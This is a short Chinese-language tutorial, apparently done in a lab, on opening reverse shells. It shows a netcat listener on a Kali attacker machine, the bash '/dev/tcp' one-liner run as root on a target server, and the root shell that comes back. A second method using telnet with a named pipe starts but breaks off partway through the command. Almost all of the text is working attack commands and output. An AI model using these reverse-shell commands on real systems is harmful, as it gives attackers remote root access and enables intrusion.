一、通过bash反弹shell
1、 在攻击机上通过nc命令监听2222端口
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222
listening on [any] 2222 ...
2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口
[root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1
3、连接成功
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvvp 2222
listening on [any] 2222 ...
192.168.137.130: inverse host lookup failed: Unknown host
connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 60192
[root@localhost netcat-0.7.1]# id
id
uid=0(root) gid=0(root) 组=0(root)
二、通过telnet反弹shell
1、在攻击机上通过nc命令监听2222端口
┌──(kali㉿kali)-[~/Desktop]
└─$ netcat -lvvp 2222
listening on [any] 2222 ...
2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口
[root@localhost hids]# mknod a p; telnet 192.168.137.1